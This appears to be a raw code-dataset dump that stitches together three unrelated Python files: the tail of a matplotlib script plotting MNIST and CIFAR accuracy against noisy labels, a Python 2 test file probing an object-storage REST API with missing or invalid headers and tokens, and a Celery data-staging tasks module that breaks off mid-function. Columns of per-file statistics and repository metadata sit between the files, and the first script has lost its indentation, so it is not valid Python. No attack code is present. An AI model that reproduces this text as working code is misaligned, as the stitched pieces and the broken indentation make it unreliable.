elif meta["binary"] == "False":
nonbinary_performance.append([alpha, accuracy])
else:
print("???")
exit(-1)
binary_performance = np.sort(np.array(binary_performance), axis=0)
nonbinary_performance = np.sort(np.array(nonbinary_performance), axis=0)
meta = {}
with open('./results/' + data_dir + "/meta.txt", "r") as param_file:
for line in param_file:
key, val = line.partition("=")[::2]
meta[key.strip()] = val.strip()
plt.figure(1)
plt.plot(nonbinary_performance[:, 0], 100-nonbinary_performance[:, 1], colors[c]+"o-", label=meta["network"] + meta["layer"])
plt.figure(2)
plt.plot(binary_performance[:, 0], 100-binary_performance[:, 1], colors[c]+"s--", label="Binarized " + meta["network"] + meta["layer"])
plt.figure(3)
plt.plot(nonbinary_performance[:, 0], 100-nonbinary_performance[:, 1], colors[c]+"o-", label=meta["network"] + meta["layer"])
plt.plot(binary_performance[:, 0], 100-binary_performance[:, 1], colors[c]+"s--", label="Binarized " + meta["network"] + meta["layer"])
plt.grid()
plt.xlabel(r"Number of noisy labels per clean label $\alpha$")
plt.ylabel("Prediction accuracy")
plt.ylim(50, 100)
plt.xlim(0, 100)
plt.legend(loc="lower left")
plt.savefig("./plots/mnist_uniform_" + meta["network"] + meta["layer"] + ".png")
plt.close(3)
c = c + 1
plt.figure(1)
plt.grid()
plt.xlabel(r"Number of noisy labels per clean label $\alpha$")
plt.ylabel("Prediction accuracy")
plt.ylim(50, 100)
plt.xlim(0, 100)
plt.legend(loc="lower left")
plt.savefig("./plots/mnist_uniform_overview.png")
plt.close(1)
plt.figure(2)
plt.grid()
plt.xlabel(r"Number of noisy labels per clean label $\alpha$")
plt.ylabel("Prediction accuracy")
plt.ylim(50, 100)
plt.xlim(0, 100)
plt.legend(loc="lower left")
plt.savefig("./plots/mnist_uniform_overview_binary.png")
plt.close(2)
# Cifar10
data_dirs = ["cifar_cnn_2_layer", "cifar_cnn_4_layer"]
colors = ["r", "g", "b", "m", "o", "c"]
c = 0
for data_dir in data_dirs:
sub_dirs = glob('./results/' + data_dir + "/*/")
binary_performance = []
nonbinary_performance = []
for sub_dir in sub_dirs:
meta = {}
with open(sub_dir + "params.txt", "r") as param_file:
for line in param_file:
key, val = line.partition("=")[::2]
meta[key.strip()] = val.strip()
alpha = int(meta["nalpha"])
accuracy = np.loadtxt(sub_dir + "performance.dat")[-1, 8]
if meta["binary"] == "True":
binary_performance.append([alpha, accuracy])
elif meta["binary"] == "False":
nonbinary_performance.append([alpha, accuracy])
else:
print("???")
exit(-1)
binary_performance = np.sort(np.array(binary_performance), axis=0)
nonbinary_performance = np.sort(np.array(nonbinary_performance), axis=0)
meta = {}
with open('./results/' + data_dir + "/meta.txt", "r") as param_file:
for line in param_file:
key, val = line.partition("=")[::2]
meta[key.strip()] = val.strip()
plt.figure(4)
plt.plot(nonbinary_performance[:, 0], 100-nonbinary_performance[:, 1], colors[c]+"o-", label=meta["network"] + meta["layer"])
plt.figure(5)
plt.plot(binary_performance[:, 0], 100-binary_performance[:, 1], colors[c]+"s--", label="Binarized " + meta["network"] + meta["layer"])
plt.figure(6)
plt.plot(nonbinary_performance[:, 0], 100-nonbinary_performance[:, 1], colors[c]+"o-", label=meta["network"] + meta["layer"])
plt.plot(binary_performance[:, 0], 100-binary_performance[:, 1], colors[c]+"s--", label="Binarized " + meta["network"] + meta["layer"])
plt.grid()
plt.xlabel(r"Number of noisy labels per clean label $\alpha$")
plt.ylabel("Prediction accuracy")
plt.ylim(40, 80)
plt.xlim(0, 10)
plt.legend(loc="lower left")
plt.savefig("./plots/cifar_uniform_" + meta["network"] + meta["layer"] + ".png")
plt.close(6)
c = c + 1
plt.figure(4)
plt.grid()
plt.xlabel(r"Number of noisy labels per clean label $\alpha$")
plt.ylabel("Prediction accuracy")
plt.ylim(40, 80)
plt.xlim(0, 10)
plt.legend(loc="lower left")
plt.savefig("./plots/cifar_uniform_overview.png")
plt.close(4)
plt.figure(5)
plt.grid()
plt.xlabel(r"Number of noisy labels per clean label $\alpha$")
plt.ylabel("Prediction accuracy")
plt.ylim(40, 80)
plt.xlim(0, 10)
plt.legend(loc="lower left")
plt.savefig("./plots/cifar_uniform_overview_binary.png")
plt.close(5)
| 33.59375
| 139
| 0.620279
| 745
| 5,375
| 4.355705
| 0.139597
| 0.083821
| 0.046225
| 0.061633
| 0.938675
| 0.924499
| 0.914022
| 0.914022
| 0.894915
| 0.894915
| 0
| 0.029792
| 0.194419
| 5,375
| 160
| 140
| 33.59375
| 0.71963
| 0.002419
| 0
| 0.839695
| 0
| 0
| 0.208396
| 0.036194
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.038168
| 0
| 0.038168
| 0.015267
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b296c5a33a6ed3faf452bda63784d835915304f3
| 14,371
|
py
|
Python
|
testcases/test_9_get_object.py
|
evilbrave/REST_API_TESTCASES
|
dccfddf2030adbf8188e0e7bf6dbfa4fa581a420
|
[
"MIT"
] | 1
|
2018-08-07T21:53:52.000Z
|
2018-08-07T21:53:52.000Z
|
testcases/test_9_get_object.py
|
evilbrave/REST_API_TESTCASES
|
dccfddf2030adbf8188e0e7bf6dbfa4fa581a420
|
[
"MIT"
] | null | null | null |
testcases/test_9_get_object.py
|
evilbrave/REST_API_TESTCASES
|
dccfddf2030adbf8188e0e7bf6dbfa4fa581a420
|
[
"MIT"
] | 1
|
2019-01-31T13:57:34.000Z
|
2019-01-31T13:57:34.000Z
|
from urllib import quote
import test_1_device_auth
import common_data
from signature import Signature
import requests
url = common_data.oss_url
# url = "http://127.0.0.1:8888"
path = "/v1/objects/"
def init_headers(headers):
headers['X-Api-Key'] = common_data.x_api_key
headers['X-Signature'] = ""
return headers
def init_body_content(body_content):
body_content['certificate_serial'] = common_data.certificate_serial
body_content['access_token'] = ""
return body_content
def testcase_0(headers, body_content, domain, key):
headers = headers.copy()
body_content = body_content.copy()
concat_dict = body_content.copy()
concat_dict['domain'] = domain
concat_dict['key'] = key
concat_text = common_data.get_concat_text(concat_dict)
signature = Signature()
signature.load_key(common_data.certificate_serial)
signed_signature = signature.sign(concat_text)
headers['X-Signature'] = signed_signature
response = requests.get(url + path + domain + "/" + key, params=body_content, headers=headers)
#response = requests.get(url + path + domain +"/" + key, params=body_content, headers=headers, allow_redirects=False)
if response.status_code == 200 :
print "TEST CASE 0 OK"
else:
print "TEST CASE 0 FAILED"
print response.status_code
print "HTTP Header:" + str(headers)
print "HTTP Body:" + str(body_content)
print response.text
def testcase_1(headers, body_content, domain, key):
headers = headers.copy()
body_content = body_content.copy()
headers.pop('X-Api-Key')
concat_dict = body_content.copy()
concat_dict['domain'] = domain
concat_dict['key'] = key
concat_text = common_data.get_concat_text(concat_dict)
signature = Signature()
signature.load_key(common_data.certificate_serial)
signed_signature = signature.sign(concat_text)
headers['X-Signature'] = signed_signature
response = requests.get(url + path + domain + "/" + key, params=body_content, headers=headers)
#response = requests.get(url + path + domain +"/" + key, params=body_content, headers=headers, allow_redirects=False)
# TODO check error code
if response.status_code == 200 :
print "TEST CASE 1 OK"
else:
print "TEST CASE 1 FAILED"
print response.status_code
print "HTTP Header:" + str(headers)
print "HTTP Body:" + str(body_content)
print response.text
def testcase_2(headers, body_content, domain, key):
headers = headers.copy()
body_content = body_content.copy()
headers.pop('X-Signature')
response = requests.get(url + path + domain + "/" + key, params=body_content, headers=headers)
#response = requests.get(url + path + domain +"/" + key, params=body_content, headers=headers, allow_redirects=False)
if response.status_code == 400 and response.json()['code'] == "400.0":
print "TEST CASE 2 OK"
else:
print "TEST CASE 2 FAILED"
print response.status_code
print "HTTP Header:" + str(headers)
print "HTTP Body:" + str(body_content)
print response.text
def testcase_3(headers, body_content, domain, key):
headers = headers.copy()
body_content = body_content.copy()
domain = ""
concat_dict = body_content.copy()
concat_dict['domain'] = domain
concat_dict['key'] = key
concat_text = common_data.get_concat_text(concat_dict)
signature = Signature()
signature.load_key(common_data.certificate_serial)
signed_signature = signature.sign(concat_text)
headers['X-Signature'] = signed_signature
response = requests.get(url + path + domain + "/" + key, params=body_content, headers=headers)
#response = requests.get(url + path + domain +"/" + key, params=body_content, headers=headers, allow_redirects=False)
# TODO check error code
if response.status_code == 400 and response.json()['code'] == "400.0":
print "TEST CASE 3 OK"
else:
print "TEST CASE 3 FAILED"
print response.status_code
print "HTTP Header:" + str(headers)
print "HTTP Body:" + str(body_content)
print response.text
def testcase_4(headers, body_content, domain, key):
headers = headers.copy()
body_content = body_content.copy()
key = ""
concat_dict = body_content.copy()
concat_dict['domain'] = domain
concat_dict['key'] = key
concat_text = common_data.get_concat_text(concat_dict)
signature = Signature()
signature.load_key(common_data.certificate_serial)
signed_signature = signature.sign(concat_text)
headers['X-Signature'] = signed_signature
response = requests.get(url + path + domain + "/" + key, params=body_content, headers=headers)
#response = requests.get(url + path + domain +"/" + key, params=body_content, headers=headers, allow_redirects=False)
# TODO check error code
if response.status_code == 400 and response.json()['code'] == "400.0":
print "TEST CASE 4 OK"
else:
print "TEST CASE 4 FAILED"
print response.status_code
print "HTTP Header:" + str(headers)
print "HTTP Body:" + str(body_content)
print response.text
def testcase_5(headers, body_content, domain, key):
headers = headers.copy()
body_content = body_content.copy()
body_content.pop('certificate_serial')
concat_dict = body_content.copy()
concat_dict['domain'] = domain
concat_dict['key'] = key
concat_text = common_data.get_concat_text(concat_dict)
signature = Signature()
signature.load_key(common_data.certificate_serial)
signed_signature = signature.sign(concat_text)
headers['X-Signature'] = signed_signature
response = requests.get(url + path + domain + "/" + key, params=body_content, headers=headers)
#response = requests.get(url + path + domain +"/" + key, params=body_content, headers=headers, allow_redirects=False)
if response.status_code == 400 and response.json()['code'] == "400.2":
print "TEST CASE 5 OK"
else:
print "TEST CASE 5 FAILED"
print response.status_code
print "HTTP Header:" + str(headers)
print "HTTP Body:" + str(body_content)
print response.text
def testcase_6(headers, body_content, domain, key):
headers = headers.copy()
body_content = body_content.copy()
body_content.pop('access_token')
concat_dict = body_content.copy()
concat_dict['domain'] = domain
concat_dict['key'] = key
concat_text = common_data.get_concat_text(concat_dict)
signature = Signature()
signature.load_key(common_data.certificate_serial)
signed_signature = signature.sign(concat_text)
headers['X-Signature'] = signed_signature
response = requests.get(url + path + domain + "/" + key, params=body_content, headers=headers)
#response = requests.get(url + path + domain +"/" + key, params=body_content, headers=headers, allow_redirects=False)
if response.status_code == 400 and response.json()['code'] == "400.6":
print "TEST CASE 6 OK"
else:
print "TEST CASE 6 FAILED"
print response.status_code
print "HTTP Header:" + str(headers)
print "HTTP Body:" + str(body_content)
print response.text
def testcase_7(headers, body_content, domain, key):
headers = headers.copy()
body_content = body_content.copy()
headers['X-Api-Key'] = "INVALID_X_API_KEY"
concat_dict = body_content.copy()
concat_dict['domain'] = domain
concat_dict['key'] = key
concat_text = common_data.get_concat_text(concat_dict)
signature = Signature()
signature.load_key(common_data.certificate_serial)
signed_signature = signature.sign(concat_text)
headers['X-Signature'] = signed_signature
response = requests.get(url + path + domain + "/" + key, params=body_content, headers=headers)
#response = requests.get(url + path + domain +"/" + key, params=body_content, headers=headers, allow_redirects=False)
if response.status_code == 400 and response.json()['code'] == "400.6":
print "TEST CASE 7 OK"
else:
print "TEST CASE 7 FAILED"
print response.status_code
print "HTTP Header:" + str(headers)
print "HTTP Body:" + str(body_content)
print response.text
def testcase_8(headers, body_content, domain, key):
headers = headers.copy()
body_content = body_content.copy()
headers['X-Signature'] = "INVALID_X_SIGNATURE"
response = requests.get(url + path + domain + "/" + key, params=body_content, headers=headers)
#response = requests.get(url + path + domain +"/" + key, params=body_content, headers=headers, allow_redirects=False)
if response.status_code == 400 and response.json()['code'] == "400.1":
print "TEST CASE 8 OK"
else:
print "TEST CASE 8 FAILED"
print response.status_code
print "HTTP Header:" + str(headers)
print "HTTP Body:" + str(body_content)
print response.text
def testcase_9(headers, body_content, domain, key):
headers = headers.copy()
body_content = body_content.copy()
domain = quote(domain+"###@@@@")
concat_dict = body_content.copy()
concat_dict['domain'] = domain
concat_dict['key'] = key
concat_text = common_data.get_concat_text(concat_dict)
signature = Signature()
signature.load_key(common_data.certificate_serial)
signed_signature = signature.sign(concat_text)
headers['X-Signature'] = signed_signature
response = requests.get(url + path + domain + "/" + key, params=body_content, headers=headers)
#response = requests.get(url + path + domain +"/" + key, params=body_content, headers=headers, allow_redirects=False)
if response.status_code == 400 and response.json()['code'] == "400.6":
print "TEST CASE 9 OK"
else:
print "TEST CASE 9 FAILED"
print response.status_code
print "HTTP Header:" + str(headers)
print "HTTP Body:" + str(body_content)
print response.text
def testcase_10(headers, body_content, domain, key):
headers = headers.copy()
body_content = body_content.copy()
key = quote(key+"###@@@@")
concat_dict = body_content.copy()
concat_dict['domain'] = domain
concat_dict['key'] = key
concat_text = common_data.get_concat_text(concat_dict)
signature = Signature()
signature.load_key(common_data.certificate_serial)
signed_signature = signature.sign(concat_text)
headers['X-Signature'] = signed_signature
response = requests.get(url + path + domain + "/" + key, params=body_content, headers=headers)
#response = requests.get(url + path + domain +"/" + key, params=body_content, headers=headers, allow_redirects=False)
if response.status_code == 400 and response.json()['code'] == "400.6":
print "TEST CASE 10 OK"
else:
print "TEST CASE 10 FAILED"
print response.status_code
print "HTTP Header:" + str(headers)
print "HTTP Body:" + str(body_content)
print response.text
def testcase_11(headers, body_content, domain, key):
headers = headers.copy()
body_content = body_content.copy()
body_content['certificate_serial'] = "INVALID_CERTIFICATE_SERIAL"
concat_dict = body_content.copy()
concat_dict['domain'] = domain
concat_dict['key'] = key
concat_text = common_data.get_concat_text(concat_dict)
signature = Signature()
signature.load_key(common_data.certificate_serial)
signed_signature = signature.sign(concat_text)
headers['X-Signature'] = signed_signature
response = requests.get(url + path + domain + "/" + key, params=body_content, headers=headers)
#response = requests.get(url + path + domain +"/" + key, params=body_content, headers=headers, allow_redirects=False)
if response.status_code == 400 and response.json()['code'] == "400.3":
print "TEST CASE 11 OK"
else:
print "TEST CASE 11 FAILED"
print response.status_code
print "HTTP Header:" + str(headers)
print "HTTP Body:" + str(body_content)
print response.text
def testcase_12(headers, body_content, domain, key):
headers = headers.copy()
body_content = body_content.copy()
body_content['access_token'] = "INVALID_ACCESS_TOKEN"
concat_dict = body_content.copy()
concat_dict['domain'] = domain
concat_dict['key'] = key
concat_text = common_data.get_concat_text(concat_dict)
signature = Signature()
signature.load_key(common_data.certificate_serial)
signed_signature = signature.sign(concat_text)
headers['X-Signature'] = signed_signature
response = requests.get(url + path + domain + "/" + key, params=body_content, headers=headers)
#response = requests.get(url + path + domain +"/" + key, params=body_content, headers=headers, allow_redirects=False)
if response.status_code == 401 and response.json()['code'] == "401.0":
print "TEST CASE 12 OK"
else:
print "TEST CASE 12 FAILED"
print response.status_code
print "HTTP Header:" + str(headers)
print "HTTP Body:" + str(body_content)
print response.text
if __name__ == '__main__':
# set headers
headers = dict()
headers = init_headers(headers)
# set body
body_content = dict()
init_body_content(body_content)
sso_tokens = test_1_device_auth.get_device_authentication_token()
if sso_tokens.has_key('access_token') and sso_tokens.has_key('refresh_token'):
body_content['access_token'] = sso_tokens['access_token']
else:
print "[Error] init access token failed!"
exit(-1)
domain = "TEST_DOMAIN"
key = "TEST_KEY"
testcase_0(headers, body_content, domain, key)
# testcase_1(headers, body_content, domain, key)
# testcase_2(headers, body_content, domain, key)
# testcase_3(headers, body_content, domain, key)
# testcase_4(headers, body_content, domain, key)
# testcase_5(headers, body_content, domain, key)
# testcase_6(headers, body_content, domain, key)
# testcase_7(headers, body_content, domain, key)
# testcase_8(headers, body_content, domain, key)
# testcase_9(headers, body_content, domain, key)
# testcase_10(headers, body_content, domain, key)
# testcase_11(headers, body_content, domain, key)
# testcase_12(headers, body_content, domain, key)
| 35.748756
| 121
| 0.681998
| 1,827
| 14,371
| 5.151067
| 0.048714
| 0.134417
| 0.049729
| 0.066305
| 0.912762
| 0.88099
| 0.88099
| 0.828392
| 0.824992
| 0.824992
| 0
| 0.013994
| 0.199429
| 14,371
| 401
| 122
| 35.837905
| 0.803998
| 0.15246
| 0
| 0.708772
| 0
| 0
| 0.115822
| 0.00214
| 0
| 0
| 0
| 0.002494
| 0
| 0
| null | null | 0
| 0.017544
| null | null | 0.277193
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
a23212621f3f0c4144385a646cf42bb3530df1db
| 24,046
|
py
|
Python
|
staging/staging/tasks.py
|
lexis-project/ddi-service-apis
|
9e96c4159154d70613b1977a8ea28374c038b463
|
[
"Apache-2.0"
] | null | null | null |
staging/staging/tasks.py
|
lexis-project/ddi-service-apis
|
9e96c4159154d70613b1977a8ea28374c038b463
|
[
"Apache-2.0"
] | null | null | null |
staging/staging/tasks.py
|
lexis-project/ddi-service-apis
|
9e96c4159154d70613b1977a8ea28374c038b463
|
[
"Apache-2.0"
] | null | null | null |
import logging
import time
from django.urls import reverse
from staging_api.celery import app
from celery import states
from celery.exceptions import Ignore
from celery.result import AsyncResult
from celery import Celery
from . import data_size
from . import replication_api
from . import staging_api
import sys
import os
@app.task(bind=True)
def stage_class_1(self, input_data, clean_source=False, revoke_token=False):
logging.info("Starting Class 1 data trasnfer")
try:
# class 1 staging function
transfer = staging_api.irods_to_nfs(input_data, clean_source, revoke_token)
except Exception as e:
logging.info("Handling exception in Class 1 transfer")
logging.info("Dumping input data")
logging.info(input_data)
self.update_state(
state=states.FAILURE,
meta={
'custom': str(e),
'exc_type': type(e).__name__,
'exc_message': str(e)})
logging.info(str(self.AsyncResult(self.request.id).state))
logging.info(str(e))
data = self.request.chain
if data is not None:
logging.info(str(data))
last_task = str(data[0]["options"]["task_id"])
logging.info(last_task)
self.update_state(
task_id=last_task,
state=states.FAILURE,
meta={
'custom': str(e),
'exc_type': type(e).__name__,
'exc_message': str(e)})
self.request.chain = None
raise Ignore()
return [app.current_task.request.id, transfer]
@app.task(bind=True)
def stage_class_2(self, input_data, clean_source=False, revoke_token=False):
logging.info("Starting Class 2 data trasnfer")
try:
# class 2 staging function
transfer = staging_api.nfs_to_irods(input_data, clean_source, revoke_token)
except Exception as e:
logging.info("Handling exception in Class 2 transfer")
logging.info("Dumping input data")
logging.info(input_data)
logging.info(str(e))
self.update_state(
state=states.FAILURE,
meta={
'custom': str(e),
'exc_type': type(e).__name__,
'exc_message': str(e)})
logging.info(str(self.AsyncResult(self.request.id).state))
data = self.request.chain
if data is not None:
logging.info(str(data))
last_task = str(data[0]["options"]["task_id"])
logging.info(last_task)
self.update_state(
task_id=last_task,
state=states.FAILURE,
meta={
'custom': str(e),
'exc_type': type(e).__name__,
'exc_message': str(e)})
self.request.chain = None
raise Ignore()
return [app.current_task.request.id, transfer]
@app.task(bind=True)
def stage_class_3(self, input_data, clean_source=False, revoke_token=False):
logging.info("Starting Class 3 data trasnfer")
try:
# class 3 staging function
transfer = staging_api.nfs_to_nfs_transfer(input_data, clean_source, revoke_token)
except Exception as e:
logging.info("Handling exception in Class 1 transfer")
logging.info("Dumping input data")
logging.info(input_data)
self.update_state(
state=states.FAILURE,
meta={
'custom': str(e),
'exc_type': type(e).__name__,
'exc_message': str(e)})
logging.info(str(self.AsyncResult(self.request.id).state))
data = self.request.chain
if data is not None:
logging.info(str(data))
last_task = str(data[0]["options"]["task_id"])
logging.info(last_task)
self.update_state(
task_id=last_task,
state=states.FAILURE,
meta={
'custom': str(e),
'exc_type': type(e).__name__,
'exc_message': str(e)})
self.request.chain = None
raise Ignore()
return [app.current_task.request.id, transfer]
@app.task(bind=True)
def stage_class_4(self, input_data, revoke_token=False):
logging.info("Starting Class 4 data trasnfer")
try:
# class 4 staging function
transfer = staging_api.irods_to_local_hpc(input_data, revoke_token)
except Exception as e:
logging.info("Handling exception in Class 4 transfer")
logging.info("Dumping input data")
logging.info(input_data)
self.update_state(
state=states.FAILURE,
meta={
'custom': str(e),
'exc_type': type(e).__name__,
'exc_message': str(e)})
logging.info(str(self.AsyncResult(self.request.id).state))
data = self.request.chain
if data is not None:
logging.info(str(data))
last_task = str(data[0]["options"]["task_id"])
logging.info(last_task)
self.update_state(
task_id=last_task,
state=states.FAILURE,
meta={
'custom': str(e),
'exc_type': type(e).__name__,
'exc_message': str(e)})
self.request.chain = None
raise Ignore()
return [app.current_task.request.id, transfer]
@app.task(bind=True)
def stage_class_5(self, input_data, revoke_token=False):
logging.info("Starting Class 5 data trasnfer")
try:
# class 5 staging function
transfer = staging_api.local_hpc_to_irods(input_data, revoke_token)
except Exception as e:
logging.info("Handling exception in Class 5 transfer")
logging.info("Dumping input data")
logging.info(input_data)
self.update_state(
state=states.FAILURE,
meta={
'custom': str(e),
'exc_type': type(e).__name__,
'exc_message': str(e)})
logging.info(str(self.AsyncResult(self.request.id).state))
data = self.request.chain
if data is not None:
logging.info(str(data))
last_task = str(data[0]["options"]["task_id"])
logging.info(last_task)
self.update_state(
task_id=last_task,
state=states.FAILURE,
meta={
'custom': str(e),
'exc_type': type(e).__name__,
'exc_message': str(e)})
self.request.chain = None
raise Ignore()
return [app.current_task.request.id, transfer]
@app.task(bind=True)
def stage_class_6(self, input_data, clean_source=False, revoke_token=False):
logging.info("Starting Class 6 data trasnfer")
try:
# class 6 staging function
transfer = staging_api.nfs_to_local_hpc(input_data, clean_source, revoke_token)
except Exception as e:
logging.info("Handling exception in Class 6 transfer")
logging.info("Dumping input data")
logging.info(input_data)
self.update_state(
state=states.FAILURE,
meta={
'custom': str(e),
'exc_type': type(e).__name__,
'exc_message': str(e)})
logging.info(str(self.AsyncResult(self.request.id).state))
data = self.request.chain
if data is not None:
logging.info(str(data))
last_task = str(data[0]["options"]["task_id"])
logging.info(last_task)
self.update_state(
task_id=last_task,
state=states.FAILURE,
meta={
'custom': str(e),
'exc_type': type(e).__name__,
'exc_message': str(e)})
self.request.chain = None
raise Ignore()
return [app.current_task.request.id, transfer]
@app.task(bind=True)
def stage_class_7(self, input_data, revoke_token=False):
logging.info("Starting Class 7 data trasnfer")
try:
# class 7 staging function
transfer = staging_api.local_hpc_to_nfs(input_data, revoke_token)
except Exception as e:
logging.info("Handling exception in Class 7 transfer")
logging.info("Dumping input data")
logging.info(input_data)
self.update_state(
state=states.FAILURE,
meta={
'custom': str(e),
'exc_type': type(e).__name__,
'exc_message': str(e)})
logging.info(str(self.AsyncResult(self.request.id).state))
data = self.request.chain
if data is not None:
logging.info(str(data))
last_task = str(data[0]["options"]["task_id"])
logging.info(last_task)
self.update_state(
task_id=last_task,
state=states.FAILURE,
meta={
'custom': str(e),
'exc_type': type(e).__name__,
'exc_message': str(e)})
self.request.chain = None
raise Ignore()
return [app.current_task.request.id, transfer]
@app.task(bind=True)
def preprocess_input(self, input_data):
logging.info("Starting preprocessing")
try:
sys.stdout.write(str(staging_api.prepare_input_to_iRODS(input_data)))
except Exception as e:
logging.info("Handling exception in preprocessing")
logging.info("Dumping input data")
logging.info(input_data)
self.update_state(
state=states.FAILURE,
meta={
'custom': str(e),
'exc_type': type(e).__name__,
'exc_message': str(e)})
logging.info(str(self.AsyncResult(self.request.id).state))
data = self.request.chain
if data is not None:
logging.info(str(data))
last_task = str(data[0]["options"]["task_id"])
logging.info(last_task)
self.update_state(
task_id=last_task,
state=states.FAILURE,
meta={
'custom': str(e),
'exc_type': type(e).__name__,
'exc_message': str(e)})
self.request.chain = None
raise Ignore()
return staging_api.prepare_input_to_iRODS(input_data)
@app.task(bind=True)
def postprocess_input(self, transfer_output, input_data):
logging.info("Starting postprocessing")
try:
input_data["source_system"] = staging_api.get_local_irods()
base_path = staging_api.get_base_path(input_data["source_system"])
source_path = os.path.relpath(transfer_output[1], base_path)
input_data["source_path"] = source_path
except Exception as e:
logging.info("Handling exception in preprocessing")
logging.info("Dumping input data")
logging.info(input_data)
self.update_state(
state=states.FAILURE,
meta={
'custom': str(e),
'exc_type': type(e).__name__,
'exc_message': str(e)})
logging.info(str(self.AsyncResult(self.request.id).state))
data = self.request.chain
if data is not None:
logging.info(str(data))
last_task = str(data[0]["options"]["task_id"])
logging.info(last_task)
self.update_state(
task_id=last_task,
state=states.FAILURE,
meta={
'custom': str(e),
'exc_type': type(e).__name__,
'exc_message': str(e)})
self.request.chain = None
raise Ignore()
return input_data
@app.task(bind=True)
def delete_class_1(self, input_data):
logging.info("Starting Class 1 deletion")
revoke_token = True
try:
staging_api.delete_irods(input_data, revoke_token)
except Exception as e:
logging.info("Handling exception in Class 1 deletion")
logging.info("Dumping input data")
logging.info(input_data)
logging.info(str(e))
self.update_state(
state=states.FAILURE,
meta={
'custom': str(e),
'exc_type': type(e).__name__,
'exc_message': str(e)})
logging.info(str(self.AsyncResult(self.request.id).state))
raise Ignore()
return [app.current_task.request.id]
@app.task(bind=True)
def delete_class_2(self, input_data):
logging.info("Starting Class 2 deletion")
revoke_token = True
try:
staging_api.delete_nfs(input_data, revoke_token)
except Exception as e:
logging.info("Handling exception in Class 2 deletion")
logging.info("Dumping input data")
logging.info(input_data)
self.update_state(
state=states.FAILURE,
meta={
'custom': str(e),
'exc_type': type(e).__name__,
'exc_message': str(e)})
logging.info(str(self.AsyncResult(self.request.id).state))
raise Ignore()
return [app.current_task.request.id]
@app.task(bind=True)
def delete_class_3(self, input_data):
logging.info("Starting Class 3 deletion")
revoke_token = True
try:
staging_api.delete_hpc(input_data, revoke_token)
except Exception as e:
logging.info("Handling exception in Class 3 deletion")
logging.info("Dumping input data")
logging.info(input_data)
self.update_state(
state=states.FAILURE,
meta={
'custom': str(e),
'exc_type': type(e).__name__,
'exc_message': str(e)})
logging.info(str(self.AsyncResult(self.request.id).state))
raise Ignore()
return [app.current_task.request.id]
@app.task(bind=True)
def get_data_size(self, input_data):
logging.info("Starting the get data size task")
try:
size = data_size.get_data_size(input_data)
logging.info(size)
except Exception as e:
logging.info("Handling exception in data size class")
logging.info("Dumping input data")
logging.info(str(e))
logging.info(input_data)
self.update_state(
state=states.FAILURE,
meta={
'custom': str(e),
'exc_type': type(e).__name__,
'exc_message': str(e)})
logging.info(str(self.AsyncResult(self.request.id).state))
raise Ignore()
return [app.current_task.request.id, size]
@app.task(bind=True)
def replicate(self, input_data):
logging.info("Starting the replication task")
try:
replication = replication_api.initiate_replication(input_data)
except Exception as e:
logging.info("Handling exception in replication class")
logging.info("Dumping input data")
logging.info(str(e))
logging.info(input_data)
self.update_state(
state=states.FAILURE,
meta={
'custom': str(e),
'exc_type': type(e).__name__,
'exc_message': str(e)})
sys.stdout.write(str(self.AsyncResult(self.request.id).state))
raise Ignore()
return [app.current_task.request.id, replication]
@app.task(bind=True)
def assign_pid(self, input_data):
logging.info("Starting the PID assignment task")
try:
pid = replication_api.initiate_pid_assignment(input_data)
except Exception as e:
logging.info("Handling exception in PID assignment class")
logging.info("Dumping input data")
logging.info(str(e))
logging.info(input_data)
self.update_state(
state=states.FAILURE,
meta={
'custom': str(e),
'exc_type': type(e).__name__,
'exc_message': str(e)})
sys.stdout.write(str(self.AsyncResult(self.request.id).state))
raise Ignore()
return [app.current_task.request.id, pid]
@app.task(bind=True)
def prepare_encryption1(self, input_data):
logging.info("Starting preparation for encryption api 1")
try:
data = staging_api.prepare_encryption1(input_data)
except Exception as e:
logging.info("Handling exception in encryption api preparation 1")
logging.info("Dumping input data")
logging.info(input_data)
self.update_state(
state=states.FAILURE,
meta={
'custom': str(e),
'exc_type': type(e).__name__,
'exc_message': str(e)})
logging.info(str(self.AsyncResult(self.request.id).state))
data = self.request.chain
if data is not None:
logging.info(str(data))
last_task = str(data[0]["options"]["task_id"])
logging.info(last_task)
self.update_state(
task_id=last_task,
state=states.FAILURE,
meta={
'custom': str(e),
'exc_type': type(e).__name__,
'exc_message': str(e)})
self.request.chain = None
raise Ignore()
return data
@app.task(bind=True)
def prepare_encryption2(self, transfer_output, input_data):
logging.info("Starting preparation for encryption api 2")
try:
data = staging_api.prepare_encryption2(transfer_output, input_data)
except Exception as e:
logging.info("Handling exception in encryption api preparation 2")
logging.info("Dumping input data")
logging.info(input_data)
self.update_state(
state=states.FAILURE,
meta={
'custom': str(e),
'exc_type': type(e).__name__,
'exc_message': str(e)})
logging.info(str(self.AsyncResult(self.request.id).state))
data = self.request.chain
if data is not None:
logging.info(str(data))
last_task = str(data[0]["options"]["task_id"])
logging.info(last_task)
self.update_state(
task_id=last_task,
state=states.FAILURE,
meta={
'custom': str(e),
'exc_type': type(e).__name__,
'exc_message': str(e)})
self.request.chain = None
raise Ignore()
return data
@app.task(bind=True)
def prepare_encryption3(self, transfer_output, input_data):
logging.info("Starting preparation for encryption api 3")
try:
data = staging_api.prepare_encryption3(transfer_output, input_data)
except Exception as e:
logging.info("Handling exception in encryption api preparation 3")
logging.info("Dumping input data")
logging.info(input_data)
self.update_state(
state=states.FAILURE,
meta={
'custom': str(e),
'exc_type': type(e).__name__,
'exc_message': str(e)})
logging.info(str(self.AsyncResult(self.request.id).state))
data = self.request.chain
if data is not None:
logging.info(str(data))
last_task = str(data[0]["options"]["task_id"])
logging.info(last_task)
self.update_state(
task_id=last_task,
state=states.FAILURE,
meta={
'custom': str(e),
'exc_type': type(e).__name__,
'exc_message': str(e)})
self.request.chain = None
raise Ignore()
return data
@app.task(bind=True)
def move_nfs(self, input_data, revoke_token=False):
logging.info("Starting move nfs operation")
try:
transfer = staging_api.move_nfs(input_data, revoke_token)
